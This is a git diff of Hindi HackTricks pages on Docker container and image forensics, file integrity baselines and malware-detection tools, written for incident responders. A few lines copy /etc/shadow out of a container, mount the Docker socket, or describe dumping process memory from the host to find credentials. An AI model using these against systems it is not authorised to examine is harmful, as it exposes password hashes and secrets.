* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## कंटेनर संशोधन
|
||||
## कंटेनर मोडिफिकेशन
|
||||
|
||||
कुछ संदेह है कि किसी डॉकर कंटेनर को कंप्रोमाइज किया गया था:
|
||||
कुछ संदेह है कि किसी डॉकर कंटेनर में हमला हुआ था:
|
||||
```bash
|
||||
docker ps
|
||||
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||||
|
@ -36,12 +37,12 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI
|
|||
A /var/lib/mysql/mysql/general_log.CSV
|
||||
...
|
||||
```
|
||||
पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया** है।\
|
||||
अगर आपको लगता है कि कुछ दिलचस्प फ़ाइल जैसे कि `/etc/shadow` में संशोधन किया गया है, तो आप इसे कंटेनर से डाउनलोड करके जांच के लिए कर सकते हैं:
|
||||
पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया**।\
|
||||
अगर आपको लगता है कि कोई दिलचस्प फ़ाइल जैसे `/etc/shadow` में संशोधन किया गया है तो आप इसे कंटेनर से डाउनलोड करके जांच सकते हैं कि क्या कोई हानिकारक गतिविधि है।
|
||||
```bash
|
||||
docker cp wordpress:/etc/shadow.
|
||||
```
|
||||
आप एक नए कंटेनर चलाकर इसकी मूल फ़ाइल को निकालकर इसे मूल फ़ाइल के साथ **तुलना कर सकते हैं**:
|
||||
आप एक नए कंटेनर को चला कर इसकी तुलना **मूल फ़ाइल से कर सकते हैं** और उससे फ़ाइल निकाल सकते हैं:
|
||||
```bash
|
||||
docker run -d lamp-wordpress
|
||||
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
|
||||
|
@ -51,16 +52,16 @@ diff original_shadow shadow
|
|||
```bash
|
||||
docker exec -it wordpress bash
|
||||
```
|
||||
## छवि संशोधन
|
||||
## छवियों की संशोधन
|
||||
|
||||
जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में) तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग कर सकते हैं **संशोधनों का सारांश निकालने** के लिए:
|
||||
जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में), तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग कर सकते हैं **संशोधनों की सारांश** निकालने के लिए:
|
||||
```bash
|
||||
docker save <image> > image.tar #Export the image to a .tar file
|
||||
container-diff analyze -t sizelayer image.tar
|
||||
container-diff analyze -t history image.tar
|
||||
container-diff analyze -t metadata image.tar
|
||||
```
|
||||
फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संशयित फ़ाइलों की खोज कर सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं:
|
||||
फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संशयात्मक फ़ाइलों की खोज कर सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं:
|
||||
```bash
|
||||
tar -xf image.tar
|
||||
```
|
||||
|
@ -70,18 +71,18 @@ tar -xf image.tar
|
|||
```bash
|
||||
docker inspect <image>
|
||||
```
|
||||
आप यहाँ एक सारांश **परिवर्तन के इतिहास** प्राप्त कर सकते हैं:
|
||||
आप निम्नलिखित के साथ एक सारांश **परिवर्तन का इतिहास** प्राप्त कर सकते हैं:
|
||||
```bash
|
||||
docker history --no-trunc <image>
|
||||
```
|
||||
आप एक छवि से एक **डॉकरफ़ाइल भी उत्पन्न कर सकते हैं** इसके साथ:
|
||||
आप एक छवि से एक **डॉकरफ़ाइल भी बना सकते हैं** इसके साथ:
|
||||
```bash
|
||||
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
|
||||
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
|
||||
```
|
||||
### डाइव
|
||||
|
||||
डॉकर इमेजेस में जोड़ी गई/संशोधित फ़ाइलें खोजने के लिए आप [**डाइव**](https://github.com/wagoodman/dive) (इसे [**रिलीज़**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) से डाउनलोड करें) उपयोग कर सकते हैं:
|
||||
डॉकर इमेजेस में जोड़ी गई/संशोधित फ़ाइलें खोजने के लिए आप [**डाइव**](https://github.com/wagoodman/dive) (इसे [**रिलीज़**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) से डाउनलोड करें) उपयोगी है:
|
||||
```bash
|
||||
#First you need to load the image in your docker repo
|
||||
sudo docker load < image.tar 1 ⨯
|
||||
|
@ -90,10 +91,10 @@ Loaded image: flask:latest
|
|||
#And then open it with dive:
|
||||
sudo dive flask:latest
|
||||
```
|
||||
यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** रंग जोड़ी गई को और **पीला** रंग संशोधित को दर्शाता है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस** को फोल्डर को संक्षिप्त/खोलने के लिए करें।
|
||||
यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** जोड़ी गई है और **पीला** संशोधित कर दिया गया है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस** का उपयोग फ़ोल्डर को संक्षिप्त/खोलने के लिए करें।
|
||||
|
||||
इसके साथ आप इमेज के विभिन्न स्टेज के सामग्री तक पहुंच नहीं पाएंगे। इसे करने के लिए आपको **प्रत्येक लेयर को डीकंप्रेस करना और उस तक पहुंचना** होगा।\
|
||||
आप इमेज से सभी लेयर्स को डीकंप्रेस कर सकते हैं जिसे इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां से इमेज को डीकंप्रेस किया गया था कार्यान्वित करके:
|
||||
आप इमेज से सभी लेयर को डीकंप्रेस कर सकते हैं जो इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां इमेज को डीकंप्रेस किया गया था क्रियान्वित करके:
|
||||
```bash
|
||||
tar -xf image.tar
|
||||
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
|
||||
|
@ -102,4 +103,4 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don
|
|||
|
||||
ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रोसेस देख सकते हैं** बस `ps -ef` चलाकर
|
||||
|
||||
इसलिए (रूट के रूप में) आप **होस्ट से प्रोसेस की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** की खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)।
|
||||
इसलिए (रूट के रूप में) आप **होस्ट से प्रोसेसेस की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** के लिए खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)।
|
||||
|
|
|
@ -1,40 +1,54 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# मूल्यांकन
|
||||
# मूलाधार
|
||||
|
||||
एक मूल्यांकन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि **बदलावों को हाइलाइट करने के लिए एक भविष्य की स्थिति के साथ तुलना की जा सके**।
|
||||
एक मूलाधार किसी सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेने से बनता है **इसे भविष्य की स्थिति के साथ तुलना करने के लिए परिवर्तनों को हाइलाइट करने के लिए**।
|
||||
|
||||
उदाहरण के लिए, आप फ़ाइल सिस्टम की प्रत्येक फ़ाइल का हैश कैलकुलेट और स्टोर कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\
|
||||
इसे उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए।
|
||||
उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फ़ाइल का हैश गणना और स्टोर करना कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\
|
||||
यह भी उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए।
|
||||
|
||||
## फ़ाइल अखंडता मॉनिटरिंग
|
||||
|
||||
फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT वातावरण और डेटा की सुरक्षा करती है। इसमें दो मुख्य कदम शामिल हैं:
|
||||
फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैकिंग करके IT वातावरण और डेटा को सुरक्षित रखती है। इसमें दो मुख्य कदम शामिल हैं:
|
||||
|
||||
1. **मूल्यांकन तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूल्यांकन स्थापित करें ताकि संशोधनों का पता लगा सकें।
|
||||
2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधित किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से।
|
||||
1. **मूलाधार तुलना:** भविष्य के तुलना के लिए फ़ाइल गुणांक या क्रिप्टोग्राफिक चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूलाधार स्थापित करें ताकि संशोधनों का पता लगाने के लिए।
|
||||
2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधन किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से।
|
||||
|
||||
## उपकरण
|
||||
|
||||
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
|
||||
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
|
||||
|
||||
# संदर्भ
|
||||
## संदर्भ
|
||||
|
||||
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# मैलवेयर विश्लेषण
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## फोरेंसिक्स चीटशीट्स
|
||||
|
||||
|
@ -28,7 +29,7 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
## ऑफलाइन एंटीवायरस और पहचान उपकरण
|
||||
|
||||
### Yara
|
||||
### यारा
|
||||
|
||||
#### स्थापित
|
||||
```bash
|
||||
|
@ -37,7 +38,7 @@ sudo apt-get install -y yara
|
|||
#### नियम तैयार करें
|
||||
|
||||
इस स्क्रिप्ट का उपयोग करके गिथब से सभी यारा मैलवेयर नियम डाउनलोड और मर्ज करें: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
|
||||
_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नाम की फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे।
|
||||
_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नामक एक फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे।
|
||||
```bash
|
||||
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
|
||||
mkdir rules
|
||||
|
@ -48,9 +49,9 @@ python malware_yara_rules.py
|
|||
yara -w malware_rules.yar image #Scan 1 file
|
||||
yara -w malware_rules.yar folder #Scan the whole folder
|
||||
```
|
||||
#### YaraGen: मैलवेयर की जांच करें और नियम बनाएं
|
||||
#### YaraGen: मैलवेयर की जाँच करें और नियम बनाएं
|
||||
|
||||
आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग करके एक बाइनरी से यारा नियम उत्पन्न कर सकते हैं। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
|
||||
आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग कर सकते हैं ताकि आप एक बाइनरी से यारा नियम उत्पन्न कर सकें। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
|
||||
```bash
|
||||
python3 yarGen.py --update
|
||||
python3.exe yarGen.py --excludegood -m ../../mals/
|
||||
|
@ -67,11 +68,11 @@ sudo freshclam #Update rules
|
|||
clamscan filepath #Scan 1 file
|
||||
clamscan folderpath #Scan the whole folder
|
||||
```
|
||||
### [कैपा](https://github.com/mandiant/capa)
|
||||
### [Capa](https://github.com/mandiant/capa)
|
||||
|
||||
**कैपा** executables में पोटेंशियली हानिकारक **क्षमताएँ** का पता लगाता है: PE, ELF, .NET। इसलिए यह चीजों को खोजेगा जैसे Att\&ck तकनीकें, या संदिग्ध क्षमताएँ जैसे:
|
||||
**Capa** प्रोग्रामों में संभावित दुष्ट **क्षमताएँ** का पता लगाता है: PE, ELF, .NET। इसलिए यह चीजों को खोजेगा जैसे Att\&ck युक्तियाँ, या संदिग्ध क्षमताएँ जैसे:
|
||||
|
||||
* OutputDebugString त्रुटि की जांच करें
|
||||
* OutputDebugString त्रुटि की जाँच करें
|
||||
* सेवा के रूप में चलाएं
|
||||
* प्रक्रिया बनाएं
|
||||
|
||||
|
@ -79,15 +80,15 @@ clamscan folderpath #Scan the whole folder
|
|||
|
||||
### IOCs
|
||||
|
||||
IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ पोटेंशियली अवांछित सॉफ्टवेयर या पुष्ट **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क** में इस प्रकार के हानिकारक फ़ाइलों की **खोज के लिए** करती है।\
|
||||
इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेजी से कर सकती है।
|
||||
IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ संभावित अवांछित सॉफ्टवेयर या पुष्ट **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क्स** में **इस प्रकार के दुष्ट फ़ाइलें खोजने** के लिए करती है।\
|
||||
इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेज़ कर सकती है।
|
||||
|
||||
IOC बनाने या संशोधित करने के लिए एक उपकरण है [**IOC संपादक**](https://www.fireeye.com/services/freeware/ioc-editor.html)**।**\
|
||||
आप उपकरणों का उपयोग कर सकते हैं जैसे [**Redline**](https://www.fireeye.com/services/freeware/redline.html) **डिवाइस में परिभाषित IOC की खोज करने के लिए**।
|
||||
आप [**Redline**](https://www.fireeye.com/services/freeware/redline.html) जैसे उपकरण का उपयोग कर सकते हैं **एक उपकरण में परिभाषित IOC खोजने के लिए**।
|
||||
|
||||
### लोकी
|
||||
### Loki
|
||||
|
||||
[**लोकी**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान इंडिकेटर्स ऑफ कंप्रोमाइज के लिए।\
|
||||
[**Loki**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान दुष्टता के संकेतों के लिए।\
|
||||
पहचान चार पहचान पद्धतियों पर आधारित है:
|
||||
```
|
||||
1. File Name IOC
|
||||
|
@ -104,11 +105,11 @@ Compares process connection endpoints with C2 IOCs (new since version v.10)
|
|||
```
|
||||
### लिनक्स मैलवेयर डिटेक्ट
|
||||
|
||||
[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो गनू जीवीपीएल लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूलताओं के आसपास डिज़ाइन किया गया है। यह नेटवर्क किनारे घुसपैठ डिटेक्शन सिस्टम से धमाकों में उपयोग किया जा रहा मैलवेयर निकालने के लिए धमाकों से निकाला गया मैलवेयर का डेटा उपयोग करता है और पहचान के लिए सिग्नेचर उत्पन्न करता है। साथ ही, धमाकों से डेटा भी LMD चेकआउट सुविधा और मैलवेयर समुदाय संसाधनों से प्राप्त किया जाता है।
|
||||
[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो गीनू GPLv2 लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूल सामना करने के लिए डिज़ाइन किया गया है। यह नेटवर्क एज इन्ट्रूजन डिटेक्शन सिस्टम से धमाकों में उपयोग किया जा रहा मैलवेयर को निकालने के लिए धमाकों के खतरों के आसपास डिज़ाइन किया गया है और पहचान के लिए सिग्नेचर उत्पन्न करता है। साथ ही, धमाकों के डेटा को भी LMD चेकआउट सुविधा और मैलवेयर समुदाय संसाधनों से प्राप्त किया जाता है।
|
||||
|
||||
### आरकेहंटर
|
||||
### rkhunter
|
||||
|
||||
[**रेखंटर**](http://rkhunter.sourceforge.net) जैसे उपकरण फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जहाँ संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है।
|
||||
[**rkhunter**](http://rkhunter.sourceforge.net) जैसे उपकरण को फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जिसमें संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है।
|
||||
```bash
|
||||
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
|
||||
```
|
||||
|
@ -118,27 +119,27 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
|
|||
|
||||
### PEpper
|
||||
|
||||
[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक विषयों की जांच करता है (बाइनरी डेटा, एंट्रोपी, URLs और IPs, कुछ yara नियम।)
|
||||
[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक विषयों की जांच करता है (binary data, entropy, URLs और IPs, कुछ yara rules).
|
||||
|
||||
### PEstudio
|
||||
|
||||
[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और पोटेंशियल Att\&ck तकनीकों को भी खोजेगा।
|
||||
[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और potential Att\&ck techniques खोजेगा।
|
||||
|
||||
### Detect It Easy(DiE)
|
||||
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल को **एन्क्रिप्टेड** है या नहीं यह खोजने के लिए है और **पैकर्स** को भी खोजेगा।
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल के एन्क्रिप्टेड होने की जांच करने के लिए है और **packers** भी खोजेगा।
|
||||
|
||||
### NeoPI
|
||||
|
||||
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python स्क्रिप्ट है जो **सांख्यिकीय विधियों** का उपयोग करके **छिपे हुए** और **एन्क्रिप्टेड** सामग्री की खोज करने के लिए है। NeoPI का उद्देश्य **छिपी वेब शैल कोड** की **खोज** में सहायता करना है।
|
||||
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python script है जो **statistical methods** का उपयोग करके text/script files में **obfuscated** और **encrypted** content की पहचान करने के लिए है। NeoPI का उद्देश्य **hidden web shell code** की पहचान में सहायता करना है।
|
||||
|
||||
### **php-malware-finder**
|
||||
|
||||
